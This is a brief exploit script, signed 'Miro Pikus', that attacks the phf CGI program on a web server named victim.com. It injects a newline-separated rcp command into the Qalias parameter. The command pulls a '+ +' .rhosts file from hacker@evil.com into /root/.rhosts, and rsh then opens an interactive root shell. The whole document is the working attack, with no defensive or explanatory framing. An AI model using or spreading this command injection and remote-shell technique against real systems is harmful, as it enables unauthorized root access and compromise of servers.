Exploit:

 $ echo "+ +" > /tmp/my.rhosts
 $ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+
 /root/.rhosts" | nc -v - 20 victim.com 80
 $ rsh -l root victim.com "/bin/sh -i"
 #
                                                      Miro Pikus